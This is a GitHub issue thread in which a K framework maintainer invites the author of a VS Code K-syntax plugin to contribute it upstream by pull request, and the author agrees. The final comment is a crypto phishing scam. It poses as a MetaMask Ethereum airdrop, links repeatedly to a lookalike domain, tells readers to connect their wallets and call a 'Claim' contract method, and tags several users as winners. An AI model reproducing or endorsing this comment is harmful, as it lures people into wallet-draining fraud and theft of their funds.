### ISSUE TITLE
Contribute to upstream K

### ISSUE THREAD

**Issue by Baltoli** [PumpkinDemo/k-syntax-vscode#1]
We'd love to bring this support to the [official K editor support repository](https://github.com/kframework/k-editor-support). Would you be willing to contribute your code there?

**Comment by PumpkinDemo** [comment]
> We'd love to bring this support to the [official K editor support repository](https://github.com/kframework/k-editor-support). Would you be willing to contribute your code there?

@Baltoli 

Of course, how should I do that correctly?

This plugin is in building according to my own demand and has lots of incomplete work yet.

I will update this repo irregularly, and how to keep the upstream K repo synchronized?

**Comment by Baltoli** [comment]
> Of course, how should I do that correctly?

The ideal would be for your code to live in that repo directly, and for changes to be made via PR as we do for other editors. The benefit of doing it via PR is that the K team can take a look at your changes and validate them against the "correct" behaviour. For example, we got a contribution from an external developer for the nano editor: https://github.com/kframework/k-editor-support/pull/19

> This plugin is in building according to my own demand and has lots of incomplete work yet.

Sure, that's not a problem. Many of the existing plugins aren't complete; we're happy for contributions in any form really. I can review properly if you open a PR.

**Comment by Allen0517** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @mtranggit, @UFOXD, @Adamlixi, @aitimate, @ryanmercadante, @leyle, @coldstar1993
